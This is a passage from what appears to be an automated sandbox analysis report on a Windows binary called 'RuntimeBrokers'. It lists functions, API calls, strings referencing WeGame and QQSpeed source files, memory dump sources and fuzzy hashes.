                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?), ref: 6C156BF6
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?), ref: 6C156C7C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,Users,?,Administrators), ref: 6C156A51
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • Administrators, xrefs: 6C1568DA
                                        • [Sys_wrapper]SetFileAuthority, success: %d, current user: %s, path: %s, xrefs: 6C156CE7
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C156977, 6C156A75, 6C156C1A, 6C156CA0
                                        • [E][Sys_wrapper]SetFileAuthority, enable Administrators privilege failed: %s, xrefs: 6C1569A5
                                        • [E][Sys_wrapper]SetFileAuthority, enable Users privilege failed: %s, xrefs: 6C156AA3
                                        • Users, xrefs: 6C1569D7
                                        • [E][Sys_wrapper]SetFileAuthority, enable current user privilege failed: %s, %s, xrefs: 6C156C5D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?get_log_instance@base@@Logger@1@$AccountEnableFilePrivilege@Sys_wrapper@common@ierd_tgp@@W@2@@std@@0@$?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@W@2@@std@@$H_prolog3H_prolog3_catch_NameUser
                                        • String ID: Administrators$Users$[E][Sys_wrapper]SetFileAuthority, enable Administrators privilege failed: %s$[E][Sys_wrapper]SetFileAuthority, enable Users privilege failed: %s$[E][Sys_wrapper]SetFileAuthority, enable current user privilege failed: %s, %s$[Sys_wrapper]SetFileAuthority, success: %d, current user: %s, path: %s$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 77728784-150800822
                                        • Opcode ID: 9906e24023b042634c4b7f96e7ede83729586ded52039310d3b4ab64e2bff3af
                                        • Instruction ID: 85a25983a4c2080e22c74b8417e78027632598f76d0a35a6ec54077d0d928024
                                        • Opcode Fuzzy Hash: 9906e24023b042634c4b7f96e7ede83729586ded52039310d3b4ab64e2bff3af
                                        • Instruction Fuzzy Hash: 04D13971905258EEDB21DBA8CD98BCDB7F4AF24304F6041D9D448A7680EB35AF88CF91
                                        Function 6C103E77 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 156fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,02200000,00000000,?,B33B76E5,?,?,?,?,6C324914,000000FF), ref: 6C103F15
                                        • GetLastError.KERNEL32(?,?,6C324914,000000FF,?,6C1010CF,?,?,?), ref: 6C103F34
                                        • ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(?), ref: 6C103F5D
                                        • CloseHandle.KERNEL32(00000000,?), ref: 6C103F76
                                        • DeviceIoControl.KERNEL32(00000000,000900A8,00000000,00000000,?,00004008,?,00000000), ref: 6C103F9F
                                        • GetLastError.KERNEL32 ref: 6C103FA9
                                        • ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(?), ref: 6C104033
                                        • CloseHandle.KERNEL32(00000000,?), ref: 6C10404C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ??0path@filesystem@ierd_tgp@@CloseE@$$ErrorHandleLastV012@@$ControlCreateDeviceFile
                                        • String ID: ierd_tgp::filesystem::read_symlink
                                        • API String ID: 3286561400-3686134802
                                        • Opcode ID: a1df797d0babd394bea539abc502a270e398bbed441d23929917190a73c92677
                                        • Instruction ID: 963783da17f94a74f83a14726252751e300a4b623d72f4a8973916f218f1eb31
                                        • Opcode Fuzzy Hash: a1df797d0babd394bea539abc502a270e398bbed441d23929917190a73c92677
                                        • Instruction Fuzzy Hash: 60516FB1A10258DFDB10DFA8CC44BEEBBB8EF15318F404199E615B7680DB745E48CBA1
                                        Function 6C127C98 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 226COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C127CA2
                                        • __Init_thread_footer.LIBCMT ref: 6C12808A
                                          • Part of subcall function 6C100236: __EH_prolog3_catch.LIBCMT ref: 6C10023D
                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6C127D3F
                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6C127D6A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,00000288,?,0000015C), ref: 6C127D87
                                          • Part of subcall function 6C0FF0A4: __EH_prolog3_catch.LIBCMT ref: 6C0FF0AB
                                          • Part of subcall function 6C0B443B: memmove.VCRUNTIME140(-00000030,00000001,00000001,-00000030,00000000,?,6C0B461F,00000001,-00000030,-00000030,?,00000001,00000001,?,?), ref: 6C0B444E
                                        Strings
                                        • GetAdaptersInfo result is NULL!, xrefs: 6C127DBF
                                        • d:\ci_dev\wegame_client\codes\common\src\machine_id.cpp, xrefs: 6C127DA8
                                        • -%02x, xrefs: 6C127DFE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AdaptersH_prolog3_catchInfo$?get_log_instance@base@@H_prolog3_catch_Init_thread_footerLogger@1@memmove
                                        • String ID: -%02x$GetAdaptersInfo result is NULL!$d:\ci_dev\wegame_client\codes\common\src\machine_id.cpp
                                        • API String ID: 1435465011-618869985
                                        • Opcode ID: eb125b98751ffa5beb576c1f114c9891a4a2a8ba8ab2bf953a4dfd82e3c79125
                                        • Instruction ID: 06bdcb092a44988fac00c9b7d1059ba86a4166d2fc0ece249f3e935d660ec308
                                        • Opcode Fuzzy Hash: eb125b98751ffa5beb576c1f114c9891a4a2a8ba8ab2bf953a4dfd82e3c79125
                                        • Instruction Fuzzy Hash: 9AA1BE71901258DFCB21DFA5C854BDEBBF5AF5A308F14409AD009AB780DB396E89CF91
                                        Function 004F20F5 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004E3A46: GetLastError.KERNEL32(?,?,004BFE75,?,?,?,004BB841,00000000,?,?,?), ref: 004E3A4A
                                          • Part of subcall function 004E3A46: _free.LIBCMT ref: 004E3A7D
                                          • Part of subcall function 004E3A46: SetLastError.KERNEL32(00000000,?,?,?), ref: 004E3ABE
                                          • Part of subcall function 004E3A46: _abort.LIBCMT ref: 004E3AC4
                                          • Part of subcall function 004E3A46: _free.LIBCMT ref: 004E3AA5
                                          • Part of subcall function 004E3A46: SetLastError.KERNEL32(00000000,?,?,?), ref: 004E3AB2
                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004F2201
                                        • IsValidCodePage.KERNEL32(00000000), ref: 004F225C
                                        • IsValidLocale.KERNEL32(?,00000001), ref: 004F226B
                                        • GetLocaleInfoW.KERNEL32(?,00001001,a$N,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004F22B3
                                        • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004F22D2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                        • String ID: a$N$a$N$a$N
                                        • API String ID: 745075371-2280725905
                                        • Opcode ID: 0b4dd7f69a5e99405ab577de1c5f6dff416207ea564aba9b1e8f522dd34d071a
                                        • Instruction ID: d7c1a3e61ca6be56787de02f1b50613f34aa0784efd6d5ff8bfc7b3fc2c5659f
                                        • Opcode Fuzzy Hash: 0b4dd7f69a5e99405ab577de1c5f6dff416207ea564aba9b1e8f522dd34d071a
                                        • Instruction Fuzzy Hash: 2051947190020D9BDB10DFA5CE45EBF77B8BF09700F15046AEB10E7250EBB89A458B69
                                        Function 0047C0FD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 129processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,UG,?,00000208), ref: 0047C1C6
                                        • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0047C20B
                                        • OpenProcess.KERNEL32(00100411,00000000,?,000000FF,0000022C,?,00000002,00000000,UG,?,00000208), ref: 0047C242
                                        • GetProcessImageFileNameW.PSAPI(00000000,?,00000208,?,00000002,00000000,UG,?,00000208), ref: 0047C269
                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000208,?,00000002,00000000,UG,?,00000208), ref: 0047C2C3
                                        • Process32NextW.KERNEL32(000000FF,0000022C), ref: 0047C2DD
                                        • CloseHandle.KERNEL32(000000FF,000000FF,0000022C,?,00000002,00000000,UG,?,00000208), ref: 0047C2F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFileFirstImageNameNextOpenSnapshotToolhelp32
                                        • String ID: UG
                                        • API String ID: 14862442-3410356670
                                        • Opcode ID: 6cbcf6f20daaefeabb644a0ca8865552db0999ea8252051325aa835f178a2d9b
                                        • Instruction ID: 016fc75e4ffec959380d300229e313463785d1aa11271f9c6c478092c11aa969
                                        • Opcode Fuzzy Hash: 6cbcf6f20daaefeabb644a0ca8865552db0999ea8252051325aa835f178a2d9b
                                        • Instruction Fuzzy Hash: A851C571D0026C9ADF24DB60ED45BD977B8AF24344F1049EAA10CF51D2DBB69E84CF58
                                        Function 0048621A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.KERNEL32(00000000,?,0048647F,?,?,00000400,?,?,?), ref: 0048624C
                                        • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 0048627D
                                        • GetLastError.KERNEL32 ref: 00486289
                                        • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004862E8
                                        • WriteFile.KERNEL32(000000FF,?,?,?,00000000,?,?,?,?,?), ref: 004863B6
                                          • Part of subcall function 00485E55: GetModuleHandleW.KERNEL32(TenFact.dll), ref: 00485E67
                                        • LeaveCriticalSection.KERNEL32(00000000,?,0048647F,?,?,00000400,?,?,?), ref: 004863E1
                                        Strings
                                        • Set log file pointer at end fail , error id = %d !, xrefs: 004862C3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CriticalFileSection$DebugEnterErrorHandleLastLeaveModuleOutputPointerStringWrite
                                        • String ID: Set log file pointer at end fail , error id = %d !
                                        • API String ID: 1233083926-4247951129
                                        • Opcode ID: 8d5956001972d52e743292e670ef2a9d11b11f4a9486c7e587f3a44103fe948e
                                        • Instruction ID: d5166a2ccd76252084b51cfbf677bec20417e7a5c0ffbb67fb81e73acba4a555
                                        • Opcode Fuzzy Hash: 8d5956001972d52e743292e670ef2a9d11b11f4a9486c7e587f3a44103fe948e
                                        • Instruction Fuzzy Hash: A7512774D00258DFCB61EB14DC89BC9B3B4BB08315F0085E6E68DA62A1D7B89EC9DF54
                                        Function 6C0C7E9A Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 308COMMON
                                        Download Yara Rule
                                        APIs
                                        • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0C7EF1
                                          • Part of subcall function 6C0C7DDE: memchr.VCRUNTIME140(00000000,00000000,?,00000000,?,6C0C800A,6C422FE8,00000000,?), ref: 6C0C7DFB
                                        • __EH_prolog3.LIBCMT ref: 6C0C8078
                                          • Part of subcall function 6C1C314E: ___report_securityfailure.LIBCMT ref: 6C1C3153
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3___report_securityfailureisalnummemchr
                                        • String ID: /Bl$/Bl$/Bl$/Bl
                                        • API String ID: 908437126-1048474599
                                        • Opcode ID: 15f4781fb4f163cf0103ef6709855ca0643beb8dcb03ab18607622f1fb22a942
                                        • Instruction ID: cb43aa7f4f72cbb6e4aa8ecb115b3da8f2e24914ad0b328330739be64d3cdcb3
                                        • Opcode Fuzzy Hash: 15f4781fb4f163cf0103ef6709855ca0643beb8dcb03ab18607622f1fb22a942
                                        • Instruction Fuzzy Hash: 0AB1A971B042899FEB128FACC4A17EEBFF5EB1A310F1544ADD89057743C2348A06CBA1
                                        Function 0045E100 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 184libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004824EB: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0048250C
                                          • Part of subcall function 004824EB: _wcsrchr.LIBVCRUNTIME ref: 0048251F
                                        • LoadLibraryW.KERNEL32(?,QQSpeedUpdate.dll,00536464,?,F107BA66), ref: 0045E1DD
                                        • FreeLibrary.KERNEL32(00000000,?,?,?), ref: 0045E374
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Library$FileFreeLoadModuleName_wcsrchr
                                        • String ID: $GetGameLocalVersion$QQSpeedUpdate.dll
                                        • API String ID: 540404734-1038382258
                                        • Opcode ID: ae1585a412097f1ba14c09403a6c3f49f049b76cd85f32babece7e161ecec922
                                        • Instruction ID: 4117f17df070ed7b8788cf1f60c2bee20e2019a1e57d9f7e2b60e673059787e0
                                        • Opcode Fuzzy Hash: ae1585a412097f1ba14c09403a6c3f49f049b76cd85f32babece7e161ecec922
                                        • Instruction Fuzzy Hash: 4191E630C0928CEEEB11DBA4C9447DDBFB4AF15318F2481AED445B7282D7791B49EB26
                                        Function 6C0EAA53 Relevance: 10.6, APIs: 7, Instructions: 72threadpipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0EAA5A
                                        • InitializeCriticalSection.KERNEL32(?,?,00000004,6C0EAA41,?,00000004), ref: 6C0EAAAC
                                        • GetCurrentProcessId.KERNEL32 ref: 6C0EAAB2
                                        • GetCurrentThreadId.KERNEL32 ref: 6C0EAABA
                                        • CreateNamedPipeA.KERNEL32(?,00000003,00000000,00000001,00004000,00004000,00000000,00000000), ref: 6C0EAAE7
                                        • CreateThread.KERNEL32(00000000,00000000,6C0EAE0E,?,00000000,00000000), ref: 6C0EAAFA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6C0EAB07
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Create$CurrentThread$CriticalEventH_prolog3InitializeNamedPipeProcessSection
                                        • String ID:
                                        • API String ID: 2543911484-0
                                        • Opcode ID: 2f65061998123ff51b269b1c1eca2bd931c9e772b9b39040cff2c2cc20208879
                                        • Instruction ID: 409f0e3bf5895f9d8f7c6a0136f74ae964621ccb2e0fcb14bd7f16a7e5ce3073
                                        • Opcode Fuzzy Hash: 2f65061998123ff51b269b1c1eca2bd931c9e772b9b39040cff2c2cc20208879
                                        • Instruction Fuzzy Hash: F12131B1911250EFDF649F69C888A963EBCEF1A750F10419AF909DB286D3758900CBA0
                                        Function 6C0C60AA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0C60B1
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,00000034,6C0C7475,0000001C,6C0C59BA,?,?,?,000000D4,6C0C4672,?,?), ref: 6C0C60C6
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000001,F0000040,00000034,6C0C7475,0000001C,6C0C59BA,?,?,?,000000D4,6C0C4672,?,?), ref: 6C0C60D8
                                        Strings
                                        • __thiscall boost::uuids::detail::random_provider_base::random_provider_base(void), xrefs: 6C0C6109
                                        • CryptAcquireContext, xrefs: 6C0C60DE
                                        • d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\uuid\detail\random_provider_wincrypt.ipp, xrefs: 6C0C6104
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AcquireContextCryptErrorH_prolog3_Last
                                        • String ID: CryptAcquireContext$__thiscall boost::uuids::detail::random_provider_base::random_provider_base(void)$d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\uuid\detail\random_provider_wincrypt.ipp
                                        • API String ID: 2840587545-1991996185
                                        • Opcode ID: bbe30083d25f1838897ba1f03c1c5b52e4b0bd19bda2f1dd6878dfccaf496355
                                        • Instruction ID: 91575c9cdbd0ea2d97287170008c842e67f96482f7006b2a7250cc61007365e3
                                        • Opcode Fuzzy Hash: bbe30083d25f1838897ba1f03c1c5b52e4b0bd19bda2f1dd6878dfccaf496355
                                        • Instruction Fuzzy Hash: 7BF0BB75600194ABDB209BA08C4CFEF7AFC9F9A704F941488F504BBA80DB785945DF61
                                        Function 00468440 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDriveStringsW.KERNEL32(00000208,?), ref: 004684A1
                                        • QueryDosDeviceW.KERNEL32(00000000,?,00000208), ref: 00468517
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: DeviceDriveLogicalQueryStrings
                                        • String ID: %s%s
                                        • API String ID: 3173366581-3252725368
                                        • Opcode ID: 379a4937888c0fed09cdced84de1f6533c0fc239e769053b4c603b2e45a0cbe9
                                        • Instruction ID: a4bf308a70628c90d055735ef1ba7eca0c3a7a887b083e70a3c0821788908fb5
                                        • Opcode Fuzzy Hash: 379a4937888c0fed09cdced84de1f6533c0fc239e769053b4c603b2e45a0cbe9
                                        • Instruction Fuzzy Hash: 26412E71900219EEDB20DF14DC85BAA77F4BB44714F0081ABE849D6290EF789F85CF99
                                        Function 6C0C381C Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?qq_symmetry_encrypt3_len@@YAHH@Z.COMMON(?), ref: 6C0C3833
                                        • ?oi_symmetry_encrypt2@@YAXPBEH0PAEPAH@Z.COMMON(?,?,?,?,?,00000000,00000000), ref: 6C0C386E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?oi_symmetry_encrypt2@@?qq_symmetry_encrypt3_len@@
                                        • String ID:
                                        • API String ID: 2360126228-0
                                        • Opcode ID: 9637bee899427cc8a25badac20a81feaa85824450cac2a97d322f5df9810f3fd
                                        • Instruction ID: 0105eef6b71c3fa4139df8efe12c3e168dc26033e8e5f2473408077bfbbc56de
                                        • Opcode Fuzzy Hash: 9637bee899427cc8a25badac20a81feaa85824450cac2a97d322f5df9810f3fd
                                        • Instruction Fuzzy Hash: 71019A72611304ABEB149E18C880BEB73A9FF89B50B100519E4114B680C771FC568BE2
